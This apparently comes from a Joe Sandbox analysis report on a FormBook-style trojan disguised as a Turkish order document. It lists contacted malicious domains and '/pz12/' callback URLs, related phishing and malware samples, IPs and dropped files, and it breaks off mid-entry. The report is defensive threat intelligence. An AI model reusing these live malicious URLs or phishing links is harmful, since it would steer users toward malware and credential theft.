https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000007.00000000.2148003902.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4552727694.000000000C54A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3100767881.000000000C547000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.98980901.com/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.businessbroadway.comReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Ticari Siparis Belgesi 26 07 2024 17545000600.exe, 00000000.00000002.2128019151.0000000002A21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.xiangadvanced.siteReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/)s	explorer.exe, 00000007.00000003.3094747325.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4545593539.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000007.00000000.2149075288.000000000C860000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3103961985.000000000C860000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.317wb.com/pz12/www.loyalbahis356.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.98980901.comReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aromacuppa.comReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aromacuppa.com/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autonwheels.com/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.brenjitu1904.comReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.brenjitu1904.com/pz12/www.salesgymshark.shop	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chalkandthimble.com/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.chalkandthimble.com/pz12/www.xiangadvanced.site	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.317wb.com/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.317wb.comReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.brenjitu1904.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000007.00000003.3100077346.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4546607897.0000000009C96000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.aromacuppa.com/pz12/www.autonwheels.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aromacuppa.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xiangadvanced.site/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qqfoodsolutions.comReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chalkandthimble.comReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cripmz.xyz/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.317wb.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.loyalbahis356.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000007.00000000.2135493161.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3102199089.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3566241603.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4542934252.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.xcxocef.shop	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.datalakeflow.comReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xiangadvanced.site	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/	explorer.exe, 00000007.00000003.3094747325.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4545593539.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jnhdh8827.com/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qqfoodsolutions.com/pz12/	explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xcxocef.shop/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.v	explorer.exe, 00000007.00000002.4538762767.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2131821278.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.loyalbahis356.com/pz12/www.aromacuppa.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.businessbroadway.com/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.loyalbahis356.com/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
207.241.198.3	chalkandthimble.com	United States	397300	LIGHTSOURCE-US	true
185.148.106.70	www.loyalbahis356.com	Russian Federation	201341	TESONETLT	false
108.157.194.11	d1qrjwiza3wzm5.cloudfront.net	United States	16509	AMAZON-02US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1485412
Start date and time:	2024-07-31 15:57:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Ticari Siparis Belgesi 26 07 2024 17545000600.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@13/6@12/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 114 Number of non-executed functions: 326
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Simulations

Behavior and APIs

Time	Type	Description
09:58:05	API Interceptor	1x Sleep call for process: Ticari Siparis Belgesi 26 07 2024 17545000600.exe modified
09:58:10	API Interceptor	10x Sleep call for process: powershell.exe modified
09:58:18	API Interceptor	7686173x Sleep call for process: explorer.exe modified
09:58:55	API Interceptor	7126538x Sleep call for process: cmd.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
207.241.198.3	qRNC6mtGhI.exe	Get hash	malicious	FormBook	Browse	www.chalkandthimble.com/pz12/?GVrlQ=9hrk18tQSwkyfc2i9kPNj3yaKA8UlZiY5Un3cfGqWer7qRPGp2VeMQg9uez3OSIQAta5&6le=U0Gl
207.241.198.3	WjhF.exe	Get hash	malicious	FormBook	Browse	www.chalkandthimble.com/pz12/?ndyLnTq=9hrk18skSQhCCsrWhUPNj3yaKA8UlZiY5Un3cfGqWer7qRPGp2VeMQg9uezSVj4QAtG0&1bm=nnM0Ttr0NbXx3
108.157.194.11	https://i.mqz7or.com/l/#1barry.doan@firstontario.com	Get hash	malicious	Tycoon2FA	Browse
	https://www.canva.com/design/DAGKpnKj4ws/mV0kEuC99HToqQojoQPKQw/edit?utm_content=DAGKpnKj4ws&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	Tycoon2FA	Browse
	https://www.kudoboard.com/boards/9yja32B2/	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	http://plnbl.io/review/WX__Ro3YJP2_	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	https://dd404011sl.balancasoriente.com.br/br1111YWNjb3VudHNAaW5maW5pdHkudWsuY29tVX1111	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	https://m.exactag.com/ai.aspx?tc=d9498808bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Acatenconstrucoes.com%2Ffrest#Y2FybG9zLmNhYmFkYUBkYWlpY2hpLXNhbmt5by5lcw==	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//maansaa.com/new/auth//xp8tpwsulfhjn/%2F/YW5keS5ncmVmcmF0aEBrcHMuY29t	Get hash	malicious	HTMLPhisher	Browse
	paiement.xlsx	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
d1qrjwiza3wzm5.cloudfront.net	WjhF.exe	Get hash	malicious	FormBook	Browse	18.66.122.42
www.loyalbahis356.com	Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe	Get hash	malicious	FormBook	Browse	185.148.106.71
www.autonwheels.com	Documento di richiesta di preventivo NR_531 28 05 24.exe	Get hash	malicious	FormBook	Browse	172.67.153.101
www.jnhdh8827.com	rFormulariodeso.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.96.3
	Steel pipes material data sheets Bill of Quantity Valves chemicals KM C654e21011710050.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.96.3
	Material data sheets Bill of Quantity Steel pipes and chemicals KM C654e21011710050.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	188.114.96.3
	Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe	Get hash	malicious	FormBook	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LIGHTSOURCE-US	qRNC6mtGhI.exe	Get hash	malicious	FormBook	Browse	207.241.198.3
	WjhF.exe	Get hash	malicious	FormBook	Browse	207.241.198.3
	Parfumens.exe	Get hash	malicious	FormBook, GuLoader	Browse	207.241.198.5
	Afklde.exe	Get hash	malicious	FormBook, GuLoader	Browse	207.241.198.5
	38C6gV7JxB	Get hash	malicious	Mirai	Browse	23.177.125.100
TESONETLT	INVOICE - MV CNC BANGKOK - ST24PJ-278.exe	Get hash	malicious	FormBook	Browse	156.67.74.121
	Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe	Get hash	malicious	FormBook	Browse	185.148.106.71
	http://www.open-sora.org	Get hash	malicious	Exela Stealer, Growtopia, Python Stealer	Browse	156.67.75.29
	OPs5j7Yjb8.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.67.72.41
	52cMXV8Al2.elf	Get hash	malicious	Mirai	Browse	156.67.72.45
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	195.158.206.227
	TAVMCtVXa5.exe	Get hash	malicious	Unknown	Browse	156.67.72.10
	kn328E7C2B.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	156.67.71.68
	#U0111#U01a1n h#U00e0ng m#U1edbi pdf.exe	Get hash	malicious	FormBook	Browse	156.67.71.229
	0jwySdaiGH.exe	Get hash	malicious	FormBook	Browse	156.67.71.229
AMAZON-02US	https://updatingftsmkkoogjjjgjjhikvesdreal-vercel-app.translate.goog/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#c2VydmljZS5uYUBnZWxpdGEuY29t	Get hash	malicious	HtmlDropper	Browse	76.76.21.241
	https://quicknitro.shop/	Get hash	malicious	HTMLPhisher	Browse	76.76.21.22
	https://url-shield.securence.com/?p=1.0&r=vic@brodtinsurance.com&sid=1722373351257-084-00215276&s=2cgbtu52&n=bsecxhls3&ms=0.1,0.1,0.0,0.0&u=https%3A%2F%2Fhihello.me%2Fp%2F8e6a4dfa-7e69-4649-8591-556374951f64%3Fsharer_id%3DrmwO6QfrRwZg9SBrgXYDqyYh0l12	Get hash	malicious	Unknown	Browse	34.215.17.89
	https://jobsnearmeusa.com/Exit?adgroupid=109677066428&adposition=&campaignid=10045193036&creative=487634015749&device=c&feeditemid=&keyword=clasificado&loc_interest_ms=&loc_physical_ms=9007454&matchtype=b&placement=&q=clasificado&targetid=kwd-24416206&utm_campaign=10045193036_109677066428&utm_content=487634015749&utm_medium=cpc&utm_source=google-sem&utm_term=clasificado	Get hash	malicious	Unknown	Browse	3.165.190.78
	https://book.hotel-48581.eu/service/99012	Get hash	malicious	Unknown	Browse	18.239.69.49
	https://mtqr.me/springlakeboro.	Get hash	malicious	HTMLPhisher	Browse	18.239.18.36
	https://secure.bookipi.com/bpay/pay/66a8a106a4b309d1b595d02f/loading	Get hash	malicious	Unknown	Browse	13.224.189.74
	https://ik.imagekit.io/f8tu20hqk/dgdeztgrse5te45tw3w6ye5yhrdgbsdegsz.html?updatedAt=073921461586027101#ooxlYIqzDwtkOwQUESuFYrjhhPqjkP&4RLApFDgnXu&130182/227/ktzqgzfxkc.home.php?sq=1570-397727&lk=256825-14&page=955	Get hash	malicious	Unknown	Browse	65.9.7.21
	r777528623004-FedEx-Shipping-Label.exe	Get hash	malicious	FormBook	Browse	44.227.76.166
	https://fastdl.mongodb.org/windows/mongodb-windows-x86_64-6.0.16-signed.msi	Get hash	malicious	Unknown	Browse	52.217.227.120

Process:	C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.357042452875322
Encrypted:	false
SSDEEP:	24:3CytZWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKIl9r+q:yyjWSU4xymI4RfoUeW+mZ9tK8ND3
MD5:	827C68C8F65D2B0800E6791B34AB6D2E
SHA1:	151BC96F9C26C53E02D2E0DA64995A462D0C3B4E
SHA-256:	6B22A727792EC2ACE1BC27BF00BECBBD842902F2FD0FC813CF45A21A986377D5
SHA-512:	67E9E89C531B2CDF47FCBBA3F036EA66427631A8EBF287A26DD35AFB114AF6E2D945304CBF72B94358245FEED658F9BA6E19B29879AE6488D8DC7A143DCC146D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxj5slfx.zvi.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gf5ejnxc.nnp.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2q4x0gu.y4z.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
